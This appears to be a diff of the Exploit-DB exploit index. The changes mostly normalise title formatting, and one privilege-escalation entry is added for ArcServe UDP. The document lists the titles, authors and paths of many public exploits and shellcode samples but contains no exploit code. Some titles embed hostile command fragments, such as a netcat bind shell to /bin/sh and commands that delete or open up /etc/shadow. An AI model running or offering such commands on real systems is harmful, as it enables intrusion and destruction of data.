James",windows,dos,0 -12547,platforms/php/webapps/12547.txt,"e-webtech - 'new.asp?id='SQL Injection",2010-05-10,protocol,php,webapps,0 +12547,platforms/php/webapps/12547.txt,"e-webtech - 'new.asp?id=' SQL Injection",2010-05-10,protocol,php,webapps,0 12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0 12551,platforms/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,php,webapps,0 12552,platforms/php/webapps/12552.txt,"tekno.Portal 0.1b - (makale.php id) SQL Injection",2010-05-10,CoBRa_21,php,webapps,0 @@ -11499,7 +11500,7 @@ id,file,description,date,author,platform,type,port 14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 12601,platforms/php/webapps/12601.txt,"Joomla Component JE Job - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 12602,platforms/windows/dos/12602.txt,"Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 -12603,platforms/windows/dos/12603.py,"SmallFTPD FTP Server 1.0.3 - DELE Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 +12603,platforms/windows/dos/12603.py,"SmallFTPd FTP Server 1.0.3 - DELE Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - RETR Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0 12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0 @@ -11567,7 +11568,7 @@ id,file,description,date,author,platform,type,port 12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 - admin/editconfig.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusion",2006-06-17,"M.Hasran Addahroni",php,webapps,0 -28048,platforms/php/webapps/28048.txt,"RahnemaCo - page.php PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 +28048,platforms/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 28049,platforms/windows/dos/28049.html,"GreenBrowser 6.4.0515 - Heap Overflow",2013-09-03,Asesino04,windows,dos,0 28050,platforms/windows/dos/28050.txt,"Oracle Java lookUpByteBI - Heap Buffer Overflow",2013-09-03,GuHe,windows,dos,0 28051,platforms/windows/dos/28051.py,"PotPlayer 1.5.39036 - '.wav' Crash (PoC)",2013-09-03,ariarat,windows,dos,0 @@ -11601,7 +11602,7 @@ id,file,description,date,author,platform,type,port 12709,platforms/php/webapps/12709.txt,"webperformance Ecommerce - SQL Injection",2010-05-23,cyberlog,php,webapps,0 12710,platforms/windows/local/12710.c,"Kingsoft WebShield KAVSafe.sys 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 12711,platforms/php/webapps/12711.txt,"BBMedia Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 -12712,platforms/php/webapps/12712.txt,"goffgrafix - Design's SQL Injection",2010-05-23,XroGuE,php,webapps,0 +12712,platforms/php/webapps/12712.txt,"goffgrafix - Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12713,platforms/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,php,webapps,0 12714,platforms/php/webapps/12714.txt,"infoware - SQL Injection",2010-05-24,cyberlog,php,webapps,0 12715,platforms/multiple/webapps/12715.pl,"e107 - Code Exec",2010-05-24,McFly,multiple,webapps,0 @@ -11630,7 +11631,7 @@ id,file,description,date,author,platform,type,port 12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0 12744,platforms/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps,0 -12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0 +12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall - 'pages.php' SQL Injection",2010-05-26,Newbie_Campuz,php,webapps,0 12749,platforms/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,php,webapps,0 12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) Cross-Site Request Forgery Exploit",2010-05-26,l3D,windows,webapps,0 @@ -11685,7 +11686,7 @@ id,file,description,date,author,platform,type,port 12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0 12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0 12815,platforms/windows/remote/12815.txt,"GoAheaad Webserver - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,windows,remote,0 -12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar'Denial of Service",2010-05-31,TecR0c,windows,dos,0 +12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0 12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0 12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0 12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0 @@ -11716,6 +11717,7 @@ id,file,description,date,author,platform,type,port 12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0 12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0 12868,platforms/php/webapps/12868.txt,"Joomla Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0 +40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 13243,platforms/bsd_ppc/shellcode/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0 @@ -11769,7 +11771,7 @@ id,file,description,date,author,platform,type,port 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode Encoder/Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0 13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Shellcode Encoding Tool (Generator)",2005-12-16,Skylined,generator,shellcode,0 -13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 +13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback (Port 21) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Shellcode Password Protected (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 @@ -11982,19 +11984,19 @@ id,file,description,date,author,platform,type,port 13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - Add services and execve inetd Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0 -13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode",2009-07-27,Skylined,win_x86,shellcode,0 +13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 Shellcode",2009-07-27,Skylined,win_x86,shellcode,0 13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - Remote Denial of Service (APPE)",2012-03-17,"brock haun",windows,dos,0 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH omelet shellcode",2009-03-16,Skylined,win_x86,shellcode,0 +13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0 13508,platforms/win_x86/shellcode/13508.asm,"Win32 - telnetbind by Winexec 23 port Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0 13509,platforms/win_x86/shellcode/13509.c,"Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0 13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 FR - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0 13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB Kernel32.dll ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB Kernel32.dll ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 -13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback_ receive_ save and execute shellcode",2008-08-25,loco,win_x86,shellcode,0 +13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback_ receive_ save and execute Shellcode",2008-08-25,loco,win_x86,shellcode,0 13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0 13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Tiny Download and Exec Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0 13517,platforms/win_x86/shellcode/13517.asm,"Win32 - download and execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0 @@ -12010,7 +12012,7 @@ id,file,description,date,author,platform,type,port 13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0 13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)",2004-10-25,lion,win_x86,shellcode,0 13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File and Exec Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0 -13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - download and exec source shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 +13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - download and exec source Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Portshell on port 58821 Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0 13533,platforms/win_x86-64/shellcode/13533.asm,"Win64 - (URLDownloadToFileA) download and execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0 @@ -12022,9 +12024,9 @@ id,file,description,date,author,platform,type,port 14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Login Bypass",2010-07-06,"ALTBTA ",php,webapps,0 13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0 13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0 -13565,platforms/win_x86/shellcode/13565.asm,"Win32 XP SP3 - ShellExecuteA shellcode",2009-12-19,sinn3r,win_x86,shellcode,0 -13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) shellcode",2009-12-19,mr_me,lin_x86,shellcode,0 -13569,platforms/win_x86/shellcode/13569.asm,"Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 shellcode",2009-12-24,sinn3r,win_x86,shellcode,0 +13565,platforms/win_x86/shellcode/13565.asm,"Win32 XP SP3 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0 +13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode,0 +13569,platforms/win_x86/shellcode/13569.asm,"Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0 13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - portbind (Port 1337) Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0 13571,platforms/win_x86/shellcode/13571.c,"Win32/XP SP2 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode,0 13572,platforms/lin_x86/shellcode/13572.c,"Linux/x86 - unlink(/etc/passwd) & exit() Shellcode (35 bytes)",2009-12-24,sandman,lin_x86,shellcode,0 @@ -12049,15 +12051,15 @@ id,file,description,date,author,platform,type,port 13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home Edition SP2 English - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0 13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home Edition SP3 English - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0 13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0 -13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed stage-0 shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0 +13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0 13636,platforms/win_x86/shellcode/13636.c,"Win32 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0 13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 ITA - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0 13642,platforms/win_x86/shellcode/13642.txt,"Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0 -13645,platforms/windows/shellcode/13645.c,"Windows - JITed egg-hunter stage-0 shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0 +13645,platforms/windows/shellcode/13645.c,"Windows - JITed egg-hunter stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0 13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0 13648,platforms/win_x86/shellcode/13648.rb,"Win32 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0 13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/Windows 7 - JITed egg-hunter stage-0 Shellcode Adjusted universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0 -13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,lin_x86,shellcode,0 +13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - nc -lvve/bin/sh -p13377 Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0 13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod(_/etc/shadow__ 0666) Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0 13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS-Badger-Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 @@ -12262,7 +12264,7 @@ id,file,description,date,author,platform,type,port 13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 13918,platforms/multiple/webapps/13918.txt,"Spring Framework - arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 -13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - '.mp4'Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 +13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13920,platforms/windows/dos/13920.c,"H264WebCam - Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos,0 13921,platforms/windows/dos/13921.c,"PowerZip 7.21 - (Build 4010) Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13922,platforms/php/webapps/13922.txt,"Joomla Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0 @@ -12330,7 +12332,7 @@ id,file,description,date,author,platform,type,port 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds - SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13993,platforms/php/webapps/13993.txt,"k-search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 14512,platforms/php/webapps/14512.txt,"Concept E-commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0 -13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id'SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 +13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 13997,platforms/php/webapps/13997.txt,"Joomla JE Ajax Event Calendar - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0 13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH universale Buffer Overflow",2010-06-23,Madjix,windows,local,0 @@ -12678,7 +12680,7 @@ id,file,description,date,author,platform,type,port 14437,platforms/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0 14438,platforms/php/webapps/14438.txt,"Free PHP photo Gallery script - Remote File inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0 14439,platforms/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps,0 -14440,platforms/php/webapps/14440.txt,"PHPBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0 +14440,platforms/php/webapps/14440.txt,"phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0 14441,platforms/php/webapps/14441.txt,"Wordpress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0 14442,platforms/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection",2010-07-23,SONIC,php,webapps,0 14443,platforms/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,php,webapps,0 @@ -12743,7 +12745,7 @@ id,file,description,date,author,platform,type,port 14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0 -14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat'SQL Injection",2010-08-02,CoBRa_21,php,webapps,0 +14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps,0 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - modules.php SQL Injection",2010-08-02,secret,php,webapps,0 14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting",2010-08-02,"Juan Manuel Garcia",php,webapps,0 @@ -12820,7 +12822,7 @@ id,file,description,date,author,platform,type,port 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",multiple,webapps,80 -14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow",2010-08-12,Dr_IDE,windows,local,0 +14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - ' Universal' SEH Buffer Overflow",2010-08-12,Dr_IDE,windows,local,0 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local,0 14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) Denial of Service",2010-08-13,LiquidWorm,windows,dos,0 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 @@ -12872,7 +12874,7 @@ id,file,description,date,author,platform,type,port 14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service",2010-08-20,PASSEWORD,windows,dos,0 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous ",windows,shellcode,0 14698,platforms/windows/dos/14698.py,"AV Music Morpher Gold 5.0.38 - '.m3u' Denial of Service",2010-08-20,b0telh0,windows,dos,0 -14699,platforms/windows/dos/14699.py,"PlayPad Music Player 1.12 - '.mp3'Denial of Service",2010-08-20,"Praveen Darshanam",windows,dos,0 +14699,platforms/windows/dos/14699.py,"PlayPad Music Player 1.12 - '.mp3' Denial of Service",2010-08-20,"Praveen Darshanam",windows,dos,0 14702,platforms/php/webapps/14702.txt,"Joomla Component com_zina - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0 @@ -13097,7 +13099,7 @@ id,file,description,date,author,platform,type,port 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution",2010-09-16,Abysssec,windows,dos,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 -15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscal'l Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 +15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (Redhat x86_64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0 15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - '.m3u' Denial of Service",2010-10-03,"xsploited security",windows,dos,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0 @@ -13109,7 +13111,7 @@ id,file,description,date,author,platform,type,port 15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint - .bmp Crash (PoC)",2010-09-18,andrew,windows,dos,0 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0 15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0 -15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 - ERROR Based SQL Injection 'reviews.php'",2010-09-18,secret,php,webapps,0 +15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection",2010-09-18,secret,php,webapps,0 15040,platforms/php/webapps/15040.txt,"Joomla Component - (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 @@ -13224,7 +13226,7 @@ id,file,description,date,author,platform,type,port 15205,platforms/php/webapps/15205.txt,"Aspect Ratio CMS - Blind SQL Injection",2010-10-04,"Stephan Sattler",php,webapps,0 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' NULL Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 15207,platforms/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,php,webapps,0 -15208,platforms/php/webapps/15208.txt,"CuteNews - 'index.php?page'Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 +15208,platforms/php/webapps/15208.txt,"CuteNews - 'index.php?page' Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 15209,platforms/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",php,webapps,0 15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0 15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader - Array Indexing Remote Code Execution",2010-10-06,"Knud and nSense",osx,dos,0 @@ -13304,7 +13306,7 @@ id,file,description,date,author,platform,type,port 